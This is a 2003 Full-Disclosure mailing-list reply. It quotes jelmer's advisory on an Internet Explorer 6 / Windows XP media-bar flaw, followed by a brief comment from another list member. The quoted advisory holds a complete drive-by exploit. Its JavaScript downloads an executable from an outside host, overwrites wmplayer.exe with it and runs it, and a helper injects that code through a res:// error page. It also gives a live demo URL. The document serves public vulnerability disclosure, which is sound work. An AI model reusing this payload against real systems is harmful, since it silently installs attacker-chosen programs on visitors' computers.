Re: Internet explorer 6 on windows XP allows exection of arbitrary code

["Kristian Hermansen" <khermansen () ht-technology com>]

Wow, this one is pretty scary.  Nice work putting it together.  Does anyone
know if Outlook is exploitable with this?  I'd think that Outlook would not
try to play the media file, but I'm not quite sure.  Wow, what a rush of
pretty critical bugs lately!!!

Kris Hermansen


----- Original Message ----- 
From: "jelmer" <jkuperus () planet nl>
To: <bugtraq () securityfocus com>
Cc: <full-disclosure () lists netsys com>
Sent: Thursday, September 11, 2003 6:31 PM
Subject: [Full-disclosure] Internet explorer 6 on windows XP allows exection
of arbitrary code


> Internet explorer 6 on windows XP allows exection of arbitrary code
>
> DESCRIPTION :
>
> Yesterday Liu Die Yu released a number series of advisories concerning
> internet explorer
> by combining on of these issues with an earlier issue I myself reported a
> while back
> You can construct a specially crafted webpage that can take any action on
a
> users system
> including but not limited to, installing trojans, keyloggers, wiping the
> users harddrive etc.
>
>
> TECHNICAL EXPLAINATION :
>
> Internet explorer 6 comes with a media sidebar in wich you can load and
play
> mediaclips
> without even leaving the browser. when you instruct the mediabar to load a
> file from an
> unknown host or the HTTP status returned by an existing host indicates an
> error
> this media bar displays an error page inside the media bar namely
>
> res://C:\WINDOWS\System32\browselc.dll/mb404.htm#path
>
> res URL's are treated as being in the "my computer zone" and are loaded
from
> the users filesystem
> perfect conditions for the issue I describe on
>
> http://www.mail-archive.com/full-disclosure () lists netsys com/msg06791.html
>
> To work. now all that is needed is a way to inject this exploit code into
> this page
> This method was graciously provided by Liu Die Yu as you can read on
>
> http://www.securityfocus.com/archive/1/336937/2003-09-08/2003-09-14/0
>
> Combining these issues we get something like :
>
> --snip--
>
> <textarea id="code" style="display:none;">
>
>     var x = new ActiveXObject("Microsoft.XMLHTTP");
>     x.Open("GET", "http://ip3e83566f.speed.planet.nl/1.exe",0);
>     x.Send();
>
>     var s = new ActiveXObject("ADODB.Stream");
>     s.Mode = 3;
>     s.Type = 1;
>     s.Open();
>     s.Write(x.responseBody);
>
>     s.SaveToFile("C:\\Program Files\\Windows Media
Player\\wmplayer.exe",2);
>     location.href = "mms://";
>
> </textarea>
>
> <script language="javascript">
>
>     function preparecode(code) {
>         result = '';
>         lines = code.split(/\r\n/);
>         for (i=0;i<lines.length;i++) {
>
>             line = lines[i];
>             line = line.replace(/^\s+/,"");
>             line = line.replace(/\s+$/,"");
>             line = line.replace(/'/g,"\\'");
>             line = line.replace(/[\\]/g,"\\\\");
>             line = line.replace(/[/]/g,"%2f");
>
>             if (line != '') {
>                 result += line +'\\r\\n';
>             }
>         }
>         return result;
>     }
>
>     function doit() {
>         mycode = preparecode(document.all.code.value);
>         myURL = "file:javascript:eval('" + mycode + "')";
>         window.open(myURL,"_media")
>     }
>
>
>     window.open("error.jsp","_media");
>
>     setTimeout("doit()", 5000);
>
>
> </script>
>
> --snip--
>
> error.jsp is a jsp page that consists of one line, namely
>
> <% response.setStatus(HttpServletResponse.SC_UNAUTHORIZED); %>
>
>
> DEMONSTRATION :
>
> A demonstration is provided at :
>
> http://ip3e83566f.speed.planet.nl/hacked-by-chinese/5.htm
>
>
> WORKAROUND :
>
> Disable active scripting or do "the sensible thing" and pick another
browser
> such as the
> excellent mozilla firebird.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html